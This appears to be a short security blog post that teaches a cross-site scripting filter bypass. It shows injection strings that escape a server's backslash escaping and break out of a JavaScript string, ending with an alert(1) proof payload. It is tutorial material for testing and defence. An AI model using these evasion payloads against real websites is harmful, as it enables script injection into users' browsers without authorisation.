Tag Archives: Escaping

Escaping Escapes

Sometimes a server will escape special characters that are injected: For instance, injecting a " character and having it reflect as \":

Injection: xss"
Reflection:

x="xss\"";y=42;

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss\"
Reflection:

x="xss\\"";y=42;

Success!

However, if the server escapes your injected \ as \\, this technique will not work:

Injection: xss\"
Reflection:

x="xss\\\"";y=42;

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss\"*alert(1)*\"
Reflection:

x="xss\\"*alert(1)*\\"";y=42;

The *\\ following alert(1) is not valid syntax and will cause an error.

So…

Injection: xss\"*alert(1)//
Reflection:

x="xss\\"*alert(1)//";y=42;

Commenting out the rest is your best bet, unless they escape your // like \/\/. When this happens, I don’t think there’s much you can do.

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.